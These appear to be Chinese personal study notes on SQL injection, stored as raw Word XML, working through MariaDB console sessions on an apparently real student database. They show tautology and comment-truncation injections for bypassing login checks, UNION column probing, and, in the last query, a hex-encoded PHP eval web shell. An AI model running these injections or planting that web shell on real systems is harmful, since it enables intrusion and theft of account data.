    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>类型，</w:t>
      </w:r>
      <w:r>
        <w:t>=NULL</w:t>
      </w:r>
      <w:r>
        <w:t>很奇怪上次为什么可行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [PE]&gt; select count(*) from exam where answer=NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [PE]&gt; select count(*) from exam where answer is NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>|     1268 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>注释：不过注释被放到字符串里面就会被当做字符串的一部分，甚至发生转义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>注释部分会被替换为一个空格，不是什么都没有！</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> o/**/r</w:t>
      </w:r>
      <w:r>
        <w:t>是错的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1.--</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>要确保有空格断后和编译器识别方式一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student -- where;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    -&gt; ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student --where;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '--where' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2./*xxxxxxx*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109'; /*  or '1'='1'; */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        1 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">3.; </w:t>
      </w:r>
      <w:r>
        <w:t>直接执行之前的语句，后面然后后面的语句使用程序连接数据库执行的话会抛出异常（只使用这个的话）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109'; niahfoads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        1 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>测试数据库语句的时候应该在程序中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>明白</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>基于永真式的注入（相当于让</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>语句无效），所以如果账号密码没有被参数化确保传递为字符串，那么火锅就是直接爆账号密码记录表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109' or '1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.03 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''or'='or';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set, 1 warning (0.05 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109''1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id=''='';</w:t>
      </w:r>
      <w:r>
        <w:t>可以结合</w:t>
      </w:r>
      <w:r>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t>账号密码合在一起构造。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109'=''; #</w:t>
      </w:r>
      <w:r>
        <w:t>指定的记录被排除了。空字符串表示假</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150117 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set, 1 warning (0.04 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:t>会触发</w:t>
      </w:r>
      <w:r>
        <w:t>warning</w:t>
      </w:r>
      <w:r>
        <w:t>，除非</w:t>
      </w:r>
      <w:r>
        <w:t>''=''</w:t>
      </w:r>
      <w:r>
        <w:t>等被等号起来。我想这个</w:t>
      </w:r>
      <w:r>
        <w:t>warning</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>被转为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109'=0; #</w:t>
      </w:r>
      <w:r>
        <w:t>这个可以用来取反集，而且没有</w:t>
      </w:r>
      <w:r>
        <w:t>warning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150117 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.04 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果账号密码两句放到一起查询的话那只能用引号，或者使用注释变成单一字段的</w:t>
      </w:r>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果是分开的两个字段的查询就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id='2015141462109' and grade='2015'=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|        0 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student  where id=1=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150118 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set, 21 warnings (0.04 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR: No query specified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>不过类型不对的话这个</w:t>
      </w:r>
      <w:r>
        <w:t>warning</w:t>
      </w:r>
      <w:r>
        <w:t>有些多啊，所以异常处理一定要处理好，不可以太随意。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from ip where ip not like "121.48.%";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [jwc]&gt; select count(*) from student where id='2015141462109' xor 1;#</w:t>
      </w:r>
      <w:r>
        <w:t>也是有优先级的，</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>的很低。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|   150117 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>判断出字段数目（</w:t>
      </w:r>
      <w:r>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:t>）以后或者直接来：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select 1,2,3 from student; #1,2,3,4...</w:t>
      </w:r>
      <w:r>
        <w:t>可以一直写下去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 1 | 2 | 3 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---+---+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果网页哪个地方上出现了</w:t>
      </w:r>
      <w:r>
        <w:t>1,2,3</w:t>
      </w:r>
      <w:r>
        <w:t>。那么这些地方就是可以给我们</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>同样的道理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select 'hello' from jwc.student;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 2 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 2 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select  0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
